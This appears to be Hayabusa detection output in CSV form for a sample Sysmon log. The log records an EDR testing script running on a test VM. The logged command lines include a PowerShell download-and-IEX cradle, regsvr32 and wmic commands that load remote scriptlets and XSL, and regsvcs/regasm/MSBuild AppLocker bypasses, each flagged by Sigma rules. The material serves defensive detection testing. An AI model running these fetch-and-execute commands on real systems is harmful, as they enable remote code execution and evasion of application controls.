+2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1356 | PGUID: 747F3D96-6621-5D3F-0000-001071D28700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5816 | PGUID: 747F3D96-6623-5D3F-0000-001011F68700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6156 | PGUID: 747F3D96-6623-5D3F-0000-0010CBF78700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,Encoded PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Exec,PowerShell Download from URL,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:24.104 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 1176 | PGUID: 747F3D96-6624-5D3F-0000-0010E8358800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49828 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1296 | PGUID: 747F3D96-6628-5D3F-0000-001067768800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2040 | PGUID: 747F3D96-6628-5D3F-0000-001062788800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | LID: 0x413182 | PID: 4860 | PGUID: 747F3D96-6628-5D3F-0000-00105B918800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5708 | PGUID: 747F3D96-6628-5D3F-0000-0010B1968800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6552 | PGUID: 747F3D96-6628-5D3F-0000-0010349B8800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4564 | PGUID: 747F3D96-6629-5D3F-0000-0010C0BE8800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-662E-5D3F-0000-001011038900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1976 | PGUID: 747F3D96-662E-5D3F-0000-0010C2048900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2604 | PGUID: 747F3D96-662E-5D3F-0000-001054068900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4092 | PGUID: 747F3D96-6633-5D3F-0000-001051608900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6633-5D3F-0000-001092628900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6633-5D3F-0000-0010F0638900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | LID: 0x413182 | PID: 3512 | PGUID: 747F3D96-6633-5D3F-0000-0010D9778900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1652 | PGUID: 747F3D96-6638-5D3F-0000-00103DA88900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4632 | PGUID: 747F3D96-6638-5D3F-0000-001022AA8900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 4288 | PGUID: 747F3D96-6638-5D3F-0000-001067BA8900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 208 | PGUID: 747F3D96-6639-5D3F-0000-001074F48900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49829 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 4288 | PGUID: 747F3D96-6638-5D3F-0000-001067BA8900,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,../hayabusa-rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:49.340 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3240 | PGUID: 747F3D96-663D-5D3F-0000-00106F608A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-663D-5D3F-0000-001074658A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | LID: 0x413182 | PID: 5340 | PGUID: 747F3D96-663D-5D3F-0000-001062708A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4260 | PGUID: 747F3D96-6641-5D3F-0000-0010A38C8A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1516 | PGUID: 747F3D96-6641-5D3F-0000-001066918A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,../hayabusa-rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
